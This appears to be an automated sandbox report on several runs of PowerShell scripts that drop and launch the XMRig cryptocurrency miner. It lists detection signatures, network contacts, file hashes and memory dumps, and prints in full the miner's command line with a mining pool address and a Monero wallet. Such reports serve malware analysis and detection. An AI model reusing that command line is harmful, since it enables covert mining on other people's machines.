memory/3576-148-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-149-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-150-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-151-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-152-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-153-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-154-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-155-0x00007FF647500000-0x00007FF648133000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 154.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

memory/2968-0-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

memory/2968-1-0x0000024A58B60000-0x0000024A58B82000-memory.dmp

memory/2968-2-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnq0vgz4.l2s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2968-12-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/2968-14-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/2968-15-0x0000024A59040000-0x0000024A59052000-memory.dmp

memory/2968-16-0x0000024A59020000-0x0000024A5902A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3388-47-0x000002090EB70000-0x000002090EB90000-memory.dmp

memory/3388-48-0x0000020910580000-0x00000209105A0000-memory.dmp

memory/3388-49-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/2968-50-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/2968-51-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

memory/3388-54-0x00000209105C0000-0x00000209105E0000-memory.dmp

memory/3388-53-0x00000209105A0000-0x00000209105C0000-memory.dmp

memory/3388-52-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/2968-55-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/3388-56-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-57-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-58-0x00000209105A0000-0x00000209105C0000-memory.dmp

memory/3388-59-0x00000209105C0000-0x00000209105E0000-memory.dmp

memory/3388-60-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-61-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-62-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-63-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-64-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-65-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-66-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-67-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-68-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-69-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-70-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-71-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-72-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-73-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-74-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-75-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-76-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-77-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-78-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-79-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-80-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-81-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-82-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-83-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-84-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-85-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-86-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-87-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-88-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-89-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-90-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-91-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-92-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-93-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-94-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-95-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-96-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-97-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-98-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-99-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-100-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-101-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-102-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-103-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-104-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-105-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-106-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-107-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-108-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-109-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-110-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-111-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-112-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-113-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-114-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-115-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-116-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-117-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-118-0x00007FF606920000-0x00007FF607553000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win11-20240508-en

Max time kernel

1795s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/2496-0-0x00007FF8262D3000-0x00007FF8262D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lx2wutqz.mm3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2496-9-0x000002147D980000-0x000002147D9A2000-memory.dmp

memory/2496-10-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-11-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-12-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-13-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-14-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-15-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-17-0x000002147E0E0000-0x000002147E0F2000-memory.dmp

memory/2496-18-0x000002147DE10000-0x000002147DE1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4536-49-0x000001949F690000-0x000001949F6B0000-memory.dmp

memory/4536-50-0x00000194A0E90000-0x00000194A0EB0000-memory.dmp

memory/4536-51-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-54-0x00000194A0ED0000-0x00000194A0EF0000-memory.dmp

memory/4536-53-0x00000194A0EB0000-0x00000194A0ED0000-memory.dmp

memory/4536-52-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-55-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-56-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-57-0x00000194A0EB0000-0x00000194A0ED0000-memory.dmp

memory/4536-58-0x00000194A0ED0000-0x00000194A0EF0000-memory.dmp

memory/4536-59-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-60-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-61-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-62-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-63-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-64-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-65-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-66-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-67-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-68-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-69-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-70-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-71-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-72-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-73-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-74-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-75-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-76-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-77-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-78-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-79-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-80-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-81-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-82-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-83-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-84-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-85-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-86-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-87-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-88-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-89-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-90-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-91-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-92-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-93-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-94-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-95-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-96-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-97-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-98-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-99-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-100-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-101-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-102-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-103-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-104-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-105-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-106-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-107-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-108-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-109-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-110-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-111-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-112-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-113-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-114-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-115-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-116-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-117-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 23.62.61.144:443 www.bing.com tcp
US 8.8.8.8:53 144.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/4556-0-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/4556-1-0x000002A7E9A80000-0x000002A7E9AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xra30x2i.gbt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
